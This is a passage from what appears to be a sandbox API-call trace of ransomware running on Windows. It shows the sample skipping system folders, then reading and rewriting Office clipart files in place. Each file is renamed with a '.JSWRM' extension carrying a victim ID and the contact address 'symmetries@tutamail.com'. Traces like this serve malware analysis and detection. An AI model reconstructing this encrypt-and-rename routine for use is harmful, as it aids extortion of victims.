Size=0xee) returned 0x247b80 [0097.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0097.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0097.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.720] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02263_.WMF", cAlternateFileName="")) returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2=".") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="..") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="...") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="windows") returned -1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="recovery") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="perflogs") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="documents and settings") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.720] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="system volume information") returned -1 [0097.721] lstrcmpiW (lpString1="SO02263_.WMF", lpString2="msocache") returned 1 [0097.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02263_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02263_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02263_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02263_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02263_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02263_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0097.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0097.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.721] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2708) returned 1 [0097.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa90) returned 0x22fd48 [0097.722] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa90, lpOverlapped=0x0) returned 1 [0097.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.723] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa90, lpOverlapped=0x0) returned 1 [0097.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0097.723] CloseHandle (hObject=0x314) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0097.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0097.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0097.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0097.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0097.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.725] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02265_.WMF", cAlternateFileName="")) returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2=".") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="..") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="...") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="windows") returned -1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="recovery") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="perflogs") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="documents and settings") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="system volume information") returned -1 [0097.725] lstrcmpiW (lpString1="SO02265_.WMF", lpString2="msocache") returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02265_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02265_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0097.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.726] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=908) returned 1 [0097.726] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x380) returned 0x20e550 [0097.726] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x380, lpOverlapped=0x0) returned 1 [0097.727] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.727] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x380, lpOverlapped=0x0) returned 1 [0097.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0097.728] CloseHandle (hObject=0x314) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0097.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0097.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0097.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.728] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.729] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02268_.WMF", cAlternateFileName="")) returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2=".") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="..") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="...") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="windows") returned -1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="recovery") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="perflogs") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="documents and settings") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="system volume information") returned -1 [0097.729] lstrcmpiW (lpString1="SO02268_.WMF", lpString2="msocache") returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0097.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02268_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02268_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02268_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02268_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02268_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02268_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.731] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1564) returned 1 [0097.731] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x610) returned 0x2332c0 [0097.731] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x610, lpOverlapped=0x0) returned 1 [0097.732] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.732] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x610, lpOverlapped=0x0) returned 1 [0097.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0097.732] CloseHandle (hObject=0x314) returned 1 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0097.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0097.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0097.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.733] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.734] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02269_.WMF", cAlternateFileName="")) returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2=".") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="..") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="...") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="windows") returned -1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="recovery") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="perflogs") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="documents and settings") returned 1 